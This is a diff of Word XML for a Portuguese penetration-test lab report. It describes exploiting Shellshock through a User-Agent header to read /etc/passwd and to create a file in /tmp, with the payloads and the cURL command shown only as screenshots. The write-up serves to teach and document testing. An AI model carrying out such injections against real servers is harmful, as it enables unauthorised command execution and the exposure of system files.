         <w:pStyle w:val="Head2"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Exploração</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> e </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>resultados</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>Exploração e resultados</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2063,55 +1188,7 @@
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Demonstrar execução de comando remoto via </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Shellshock</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>, obtendo /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> Demonstrar execução de comando remoto via Shellshock, obtendo /etc/passwd.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2144,55 +1221,7 @@
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Inserir o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Shellshock</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> no cabeçalho </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>User-Agent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (convertido pelo CGI em HTTP_USER_AGENT) e instruir o servidor a imprimir o conteúdo do ficheiro.</w:t>
+        <w:t>Inserir o payload Shellshock no cabeçalho User-Agent (convertido pelo CGI em HTTP_USER_AGENT) e instruir o servidor a imprimir o conteúdo do ficheiro.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2211,85 +1240,138 @@
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Exemplo de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>Exemplo de payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>(enviado como valor do cabeçalho User-Agent):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:keepNext/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39EEF5CC" wp14:editId="006B9D2F">
+            <wp:extent cx="5562600" cy="3162935"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="11491023" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="11491023" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5562600" cy="3162935"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Pedido efetuado para realizar o ataque Shellshock à pasta /etc/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(enviado como valor do cabeçalho </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>User-Agent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>):</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>Comando c</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
@@ -2297,9 +1379,8 @@
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Comando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>URL</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
@@ -2307,9 +1388,112 @@
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>curl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> exemplo:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:keepNext/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F2D3148" wp14:editId="33E61C3C">
+            <wp:extent cx="3515216" cy="1362265"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="891647626" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="891647626" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3515216" cy="1362265"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Exemplo do comando cURL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Hlk213087158"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
@@ -2317,53 +1501,6 @@
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> exemplo:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Hlk213087158"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
         <w:t>Resultado:</w:t>
       </w:r>
       <w:r>
@@ -2399,87 +1536,7 @@
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> conteúdo de /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> foi retornado e guardado em evidence_password.txt. Esse ficheiro mostra as entradas típicas do sistema (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>daemon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>www</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>-data, etc.), o que confirma execução remota de comandos com os privilégios do processo web</w:t>
+        <w:t xml:space="preserve"> conteúdo de /etc/passwd foi retornado e guardado em evidence_password.txt. Esse ficheiro mostra as entradas típicas do sistema (root, daemon, www-data, etc.), o que confirma execução remota de comandos com os privilégios do processo web</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2488,73 +1545,7 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Observação:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>N</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>algumas tentativas impróprias o servidor poderá responder com erro 500 (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>ex</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>: exploit_passwd.txt regista um erro interno do servidor numa tentativa específica). Contudo, existiram execuções que retornaram o conteúdo esperado (ver evidence_password.txt).</w:t>
-      </w:r>
-    </w:p>
-    <w:bookmarkEnd w:id="0"/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2573,7 +1564,6 @@
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -2585,21 +1575,510 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Criar um ficheiro em /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>Criar um ficheiro em /tmp e demonstrar a sua existência</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Objetivo:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Demonstrar capacidade de escrita e persistência de artefactos no sistema.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Payload de criação</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (exemplo enviado em</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> User-Agent</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:keepNext/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55CBD8CA" wp14:editId="0CCCE52C">
+            <wp:extent cx="5562600" cy="1887220"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1708654607" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1708654607" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5562600" cy="1887220"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Payload injetado no cabeçalho User-Agent para criar ficheiro em /tmp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Verificação:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
